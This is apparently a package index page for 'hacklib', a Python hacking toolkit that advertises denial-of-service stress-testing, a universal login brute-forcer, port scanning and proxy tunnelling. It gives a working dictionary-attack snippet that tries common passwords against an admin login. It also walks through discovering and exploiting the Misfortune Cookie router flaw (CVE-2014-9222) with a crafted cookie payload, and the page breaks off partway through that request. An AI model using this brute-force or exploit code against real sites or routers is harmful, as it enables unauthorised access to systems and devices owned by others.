Toolkit for hacking enthusiasts using Python.
Project description
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.
Current Features:
Multi-threaded Denial of Service (DOS) stress-testing
Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins
Port Scanning
Socks4/5 proxy scraping and tunneling
Simple Dictionary Attack example with hacklib.AuthClient:
import hacklib ac = hacklib.AuthClient() # Get the top 100 most common passwords passwords = hacklib.topPasswords(100) for p in passwords: htmldata = ac.login('http://yourwebsite.com/login', 'admin', p) if 'welcome' in htmldata.lower(): print 'Password is', p break
Discovery and Exploitation of the Misfortune Cookie Exploit (CVE-2014-9222) with hacklib.PortScanner():
>>> import hacklib # Discovery >>> ps = hacklib.PortScanner() >>> ps.scan('192.168.1.1', (80, 81)) Port 80: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Server: RomPager/4.07 UPnP/1.0 EXT: # The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable. # Exploitation >>> payload = '''GET /HTTP/1.1 Host: 192.168.1.1 User-Agent: googlebot Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8 Accept-Language: en-US, en; q=0.5 Accept-Encoding: gzip, deflate Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
hacklib-0.1.4.tar.gz
(9.2 kB
view hashes)